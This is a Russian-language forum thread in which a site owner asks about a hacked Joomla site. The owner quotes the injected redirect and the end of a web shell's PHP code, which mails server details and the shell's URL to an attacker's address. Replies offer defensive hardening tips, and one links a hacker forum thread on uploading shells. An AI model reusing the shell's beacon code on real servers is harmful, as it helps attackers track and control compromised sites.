Взломали сайт на джумла нужна помощь

[drummer]

Захожу я на свой сайт на джумле mksite.com.ua и вижу редирект на dunyafutbol.net а в исходном коде:

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://dunyafutbol.net">

Тоесть удалили корневой index.php и вставили этот код. Я думал что это все удалил сайт запустился и все.
Но потом начал рыться по папкам и нашел странный файл под названием Sadrazam.php - ни один блокнот не открыл его почемуто но я справился через консоль и там было зашифрованное в 64 послание куча фукций пхп и конец:

Код Выделить Развернуть


$kime="goncu415@gmail.com";
$baslik="SadrazaM Server Avcisi V1.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['dоcument_ROOT']."\r\n";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);


Вопрос как они загрузили этот файл и что сделать чтобы защитить сайт от подобных атак.

[parmactep]

Вопрос как они загрузили этот файл и что сделать чтобы защитить сайт от подобных атак.

Sadrazam.php - это шелл
для защиты:
1. не юзать джумлу...
2. следить за правами папок
3. Поставить скрипт, проверяющий файлы на изменение
4. Не юзать джумлу.
5. не юзать джумлу.

[Lena-Miha]

Тоже сейчас впервые столкнулась со взломом сайта, вот что могу добавить из найденного в сети:

6. Вместо FTP соединения использовать SSH, не хранить пароли (вводить вручную).
7. Проверить права на файлы и папки.
8. шаблоны, модули и т.п. брать только с официальных сайтов
9. можно ограничить в htaccess доступ к файлам по ip:
       Order deny,allow
       deny from all
       allow from хxх.хxх.xx.хxх (Ваш ip)

[DNKRF]

не юзать джумлу...

Жестко...

[Innuenze]

Тоже один из сайтов недавно дефейснули. Права на папки не столь защитят от взлома. Ломают чаще всего через сторонние компоненты, а точнее через их дырки. Посмотрите у себя в логах, кто что когда и куда заливал и какие действия производил, может и получится обнаружить дырку.

Lena-Miha, это на сколько я понимаю запрет на редактирование файлов с чужого айпишника. Но хаккер на фтп не заходит, он заливает только шелл, который делает всю грязную работу. А в случае с джумлой, такой запрет может и на доступе к сайту для обычных пользователей сказаться негативно, опять-же, зависит от используемого функционала.

[webuser]

не юзать джумлу

а аналог предложить? А то получается если сайт на джумле - удаляйте и идите играть в футбол

[Lena-Miha]

Ломают чаще всего через сторонние компоненты

ага, у меня, как оказалось, это было меню-аккордеон.


Пока мучилась со своими сайтами после взлома, наткнулась на интересный такой форум, где хакеры делятся опытом по взлому.
Вот, например, обсуждение "Заливка шелла в Joomla" - [/size]http://forum.antichаt.ru/threadnav55205-5-10.html

[bigger]

Мне вот интересно, а если написать заявление в отдел К?

[Innuenze]

bigger, не смеши )) Отдел К не такой большой, чтобы заниматься каждым сайтом. Они ищут и отлавливают только самых крутых хаккеров или тех, кто спалился не на том ресурсе (какой-нибудь сайт под их присмотром а он сломал). Так было лет 5 назад, но я не думаю, что за это время ситуация изменилась.

[bigger]

а в чем проблема, написал заявление о том, что был произведен взлом твоей собственности. Была похищена важная информация.  Оценил ущерб в тысяч 10, в этом случае уже не получится закрыть дело. А там уже все, отследить проще простого. Я может и погорячился с отделом К, но дело раскрывается за неделю, после получения всех ответов на запросы к хостеру, провайдеру и в пaспортный стол.
Практика уже была по подобным делам, также уже есть приговоры по взлому персональных данных. В чем проблема то? Мне просто интересно, кто то уже пробовал или нет?